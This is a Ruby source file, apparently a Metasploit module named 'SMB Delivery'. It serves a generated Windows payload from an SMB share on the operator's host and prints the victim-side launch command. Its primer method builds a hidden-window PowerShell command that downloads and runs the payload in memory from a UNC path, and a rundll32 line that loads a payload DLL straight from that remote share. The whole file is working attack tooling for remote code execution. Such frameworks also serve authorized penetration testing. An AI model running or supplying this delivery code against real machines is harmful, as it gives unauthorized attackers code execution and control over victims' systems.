##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # SMB Delivery.
  #
  # This module does not exploit a vulnerability. It hosts a generated payload
  # on an SMB share (Share mixin) and prints the one-liner an operator must run
  # on a machine where they already have command execution; that command
  # fetches the payload from the share via its UNC path and executes it.
  #
  # Operational / security caveats a user should keep in mind:
  #   * Authentication on the served share is handled by
  #     Msf::Exploit::Remote::SMB::Server::Share and is not visible here.
  #     Treat the payload as downloadable by anyone who can reach LHOST on
  #     TCP/445 -- TODO confirm against the mixin before relying on otherwise.
  #   * The target must be able to open an outbound SMB connection to LHOST;
  #     egress filtering of 445 or host policy that blocks unauthenticated
  #     (guest) share access will make the printed command fail.
  #   * Reliability / Stability / SideEffects below are still UNKNOWN_*
  #     placeholders; fill them in once the behaviour has been characterised.
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Powershell

  # Registers the module metadata, the two delivery targets and the single
  # FILE_NAME option (the name under which the payload is exposed on the share;
  # despite the option text it is used for the PSH target as well).
  #
  # @param info [Hash] framework-supplied metadata merged via update_info
  def initialize(info = {})
    # Both targets accept the same Windows x86/x64 payloads; the only thing
    # that differs is the delivery format, which primer selects by target name.
    delivery_targets = %w[DLL PSH].map do |target_name|
      [
        target_name,
        {
          'Platform' => 'win',
          'Arch' => [ARCH_X86, ARCH_X64]
        }
      ]
    end

    module_info = {
      'Name' => "SMB Delivery",
      'Description' => %q{
        This module serves payloads via an SMB server and provides commands to retrieve
        and execute the generated payloads. Currently supports DLLs and Powershell.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Andrew Smith',
        'Russel Van Tuyl'
      ],
      'References' => [
        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
      ],
      'Payload' => {
        'Space' => 2048,
        'DisableNops' => true
      },
      'Platform' => 'win',
      'Targets' => delivery_targets,
      'Privileged' => false,
      'DisclosureDate' => '2016-07-26',
      # Index into delivery_targets: 0 => DLL.
      'DefaultTarget' => 0,
      # Placeholders -- not yet characterised (see class comment).
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    }

    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
      ]
    )
  end

  # Runs once the SMB server is listening. Builds the payload for the selected
  # target, stores it as the content the share serves (file_contents, from the
  # Share mixin) and prints the command the operator runs on the victim. The
  # command embeds `unc`, the \\LHOST\share\FILE_NAME path supplied by the
  # Share mixin.
  #
  # Nothing is sent to the target by this method; execution happens only when
  # someone runs the printed command.
  def primer
    print_status('Run the following command on the target machine:')

    selected = target.name
    if selected == 'PSH'
      # The share serves a PowerShell script carrying the encoded payload.
      script = cmd_psh_payload(payload.encoded,
                               payload_instance.arch.first,
                               remove_comspec: true,
                               wrap_double_quotes: true)
      self.file_contents = script

      # Victim side: download the script from the UNC path and execute it in
      # memory. ignore_cert comes from the Powershell mixin and presumably
      # relaxes TLS certificate checks in the WebClient; a UNC fetch is not
      # HTTPS, so it likely has no effect here -- kept for parity, confirm.
      fetch_and_run = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
      launcher = generate_psh_command_line(noprofile: true,
                                           windowstyle: 'hidden',
                                           command: "#{ignore_cert}#{fetch_and_run}")
      print_line launcher
    elsif selected == 'DLL'
      # The share serves a payload DLL; rundll32 loads it straight from the
      # UNC path, so nothing is written to the victim's disk by this command.
      self.file_contents = generate_payload_dll
      print_line("rundll32.exe #{unc},0")
    end
  end
end